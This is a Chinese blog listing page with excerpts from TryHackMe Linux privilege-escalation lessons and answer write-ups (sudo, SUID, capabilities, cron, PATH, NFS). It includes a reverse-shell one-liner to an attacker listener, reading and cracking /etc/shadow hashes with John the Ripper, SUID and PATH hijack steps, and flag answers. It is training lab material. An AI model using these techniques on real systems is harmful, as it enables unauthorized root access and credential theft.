自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(16)
  • 收藏
  • 关注

原创 【THM-题目答案】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:NFS

flag7.txt文件的内容是什么?(2)在攻击机上按照课程内容提示创建nfs.c文件,并编译为可执行文件,之后通过chmod +s nfs进行文件属性配置;(1)根据课程提示直接将设置有no_root_squash的文件夹挂载到攻击机上,这里我们将/tmp进行挂载;(3)在靶机上挂载的路径/tmp下可以看到nfs文件,./nfs即可完成root提权。【思路】:根据上题结果,可见三个结果中均有no_root_squash。【思路】:根据课程内容直接查看/etc/exports。

2026-04-10 09:19:05 124

原创 【THM-课程内容】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:NFS

如果可写共享上存在“no_root_squash”选项,我们可以创建一个设置了SUID位的可执行文件,并在目标系统上运行它。某些情况下还需要使用这两个向量,例如在目标系统上查找根SSH私钥,并通过SSH以根权限连接,而不是试图提高当前用户的权限级别。此文件是在NFS服务器安装过程中创建的,用户通常可以读取。我们将把一个“no_root_squash”共享挂载到我们的攻击机器上,并开始构建我们的可执行文件。由于我们可以设置SUID位,因此在目标系统上运行/bin/bash的简单可执行文件将完成这项工作。

2026-04-10 09:18:53 132

原创 【THM-题目答案】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:PATH

【思路】:根据上一题目中得到的拥有写权限的路径内容为/home/murdoch,切换到该路径下后发现存在test,在/tmp下创建文件thm,内容为“/bin/bash”,并设置文件权限:chmod 777 thm。【思路】:find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u。3. flag6.txt文件的内容是什么?

2026-04-09 11:05:36 107

原创 【THM-课程内容】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:PATH

如果PATH下列出了任何可写文件夹,我们可以在该目录下创建一个名为thm的二进制文件,并让我们的“PATH”脚本运行它。我们已经为/bin/bash的副本授予了可执行权限,请注意,此时它将使用我们用户的权限运行。执行后,“path”将在path下列出的文件夹中查找名为“thm”的可执行文件。通过将/bin/bash复制为/tmp文件夹下的“thm”,创建此命令相当容易。此时,路径脚本还将在/tmp文件夹下查找名为“thm”的可执行文件。我们的用户现在可以访问设置了SUID位的“path”脚本。

2026-04-09 11:05:24 442

原创 【THM-课程内容】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Cron Jobs

在这种情况下,我们应该能够在用户的主文件夹下创建一个名为“antivirus.sh”的脚本,它应该由cron作业运行。系统上的每个用户都有自己的crontab文件,无论是否登录,都可以运行特定的任务。正如您所料,我们的目标是找到一个由root设置的cron作业,并让它运行我们的脚本,最好是shell。该文件的内容显示了一个简单的脚本,用于创建prices.xls文件的备份。很简单:如果有一个以root权限运行的计划任务,并且我们可以更改将要运行的脚本,那么我们的脚本将以root特权运行。

2026-04-08 09:46:35 367

原创 【THM-题目答案】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Cron Jobs

(3) 新启动一个命令行窗口,通过John the Ripper破解matt密码,命令:john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt。bash -i >& /tcp/dev/(攻击机的IP地址)/(nc启的监听端口)0>&1。(5)拥有root权限后,直接读取flag5.txt内容即可。(1)获取root权限后,直接cat /etc/shadow。【解题】:直接cat /etc/crontab。(2) 在攻击机上通过ncq启动监听。

2026-04-08 09:46:20 36

原创 【THM-题目答案】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Capabilities

flag4.txt文件的内容是什么?6(根据课程内容,直接命令getcap -r / 2>/dev/null就可以了)根据上边搜索结果,除了vim之外,还有view,它的suid位也进行了配置。THM-9349843 (先find找到,直接view即可)

2026-04-07 09:53:02 127

原创 【THM-课程内容】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Capabilities

例如,如果SOC分析师需要使用需要启动套接字连接的工具,普通用户将无法做到这一点。如果系统管理员不想给这个用户更高的权限,他们可以更改二进制文件的功能。因此,二进制文件将完成其任务,而不需要更高权限的用户。当以无特权用户身份运行时,getcap -r /将生成大量错误,因此将错误消息重定向到/dev/null是一个很好的做法。GTFObins有一个很好的二进制文件列表,如果我们发现任何设置功能,可以利用这些二进制文件进行权限升级。因此,在枚举查找SUID的文件时,无法发现此特权升级向量。

2026-04-07 09:52:48 237

原创 【THM-题目答案】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:SUID

(3)按照搜索到的利用方式查看flag3.txt内容(flag3.txt路径可通过find找)(3) 通过命令查看/etc/shadow文件中user2的密码加密后的内容。(5)通过John the Ripper对加密内容进行尝试解密得到密码明文。(1) 首先通过命令找到base64执行文件SUID位已被设置有效。(1)首先通过命令找到base64执行文件SUID位已被设置有效。(4)复制整行内容,并在攻击机中创建文件pass.txt。找到base64越权利用方式。找到base64越权利用方式。

2026-04-03 16:01:20 224

原创 【THM-课程内容】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Suid

点击SUID按钮将过滤设置SUID位时已知可利用的二进制文件(您也可以使用此链接查看预过滤列表https://gtfobins.github.io/#+suid)。在这个阶段,我们有两个基本的权限升级选项:读取/etc/shadow文件或将用户添加到/etc/passwd。这些权限按用户权限级别授予。nano /etc/shadow将打印/etc/shadows文件的内容。一旦我们的用户被添加(请注意root:/bin/bash是如何用于提供根shell的),我们将需要切换到此用户,并希望应该具有根权限。

2026-04-03 14:58:27 210

原创 【THM-题目答案】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Sudo

$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1 (也很简单,直接sudo less /etc/shadow)THM-402028394(先sudo find / -name flag2.txt 2>/dev/null 找到文件,然后直接sudo less /home/ubnutu/flag2.txt)3 (直接sudo -l 即可)

2026-04-02 09:47:35 11

原创 【THM-课程内容】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Sudo

例如,初级SOC分析师可能需要定期使用Nmap,但不会被授予为完全的root访问权限。在这种情况下,系统管理员可以允许该用户仅以root权限运行Nmap,同时在系统的其余部分保持其常规权限级别。现在,我们可以在启动用户可以使用sudo运行的任何程序时使用此共享对象文件。在我们的例子中,Apache2、find或几乎任何可以用sudo运行的程序都可以使用。https://gtfobins.github.io/(在新选项卡中打开)是一个有价值的来源,它提供了有关如何使用您可能拥有sudo权限的任何程序的信息。

2026-04-02 09:20:58 198

原创 【THM-题目答案】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Kernel Exploits

1. 找到并使用适当的内核漏洞来获得目标系统的root权限。-find and use the appropriate kernel exploit to gain root privileges on the target system.2. flag1.txt文件的内容是什么?

2026-04-01 10:34:01 11

原创 【THM-课程内容】:Privilege Escalation-Linux Privilege Escalation-Privilege Escalation:Kernel Exploits

Linux系统中的内核负责管理系统内存与应用程序等组件之间的通信。这一关键功能要求内核拥有特定权限,因此一旦成功利用漏洞,可能导致获取root权限。特权提升的理想结果是获得root权限。有时可通过利用现有漏洞实现,或在某些情况下通过访问具有更高权限、信息或访问权限的其他用户账户来达成。尽管看似简单,请务必记住,内核漏洞利用失败可能导致系统崩溃。在尝试内核漏洞利用之前,请确保这一潜在后果在您的渗透测试范围内可被接受。除非单一漏洞能直接获取root权限,否则权限提升过程将依赖于配置错误和宽松的权限设置。

2026-04-01 10:02:23 37

原创 【THM-题目答案】:Jr Penetration Tester-Privilege Escalation-Linux Privilege Escalation-Enumeration

(输入CVE编号)-What vulnerability seem to affect the kernel of the target system?1. 目标系统的主机名是什么?

2026-03-31 17:23:54 15

原创 【THM-课程内容】:Jr Penetration Tester-Privilege Escalation-Linux Privilege Escalation-Enumeration

上面的示例返回大于100 MB的文件。这就是为什么明智的做法是使用带有“-type f 2>/dev/null”的“find”命令将错误重定向到“/dev/null”,并获得更清晰的输出(如下)。虽然此值可以很容易地更改或具有相对无意义的字符串(例如Ubuntu-3487340239),但在某些情况下,它可以提供有关目标系统在公司网络中的角色的信息(例如,生产SQL服务器的SQL-PROD-01)。ps aux:辅助选项将显示所有用户的进程(a),显示启动进程的用户(u),并显示未连接到终端的进程(x)。

2026-03-31 15:44:25 508

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除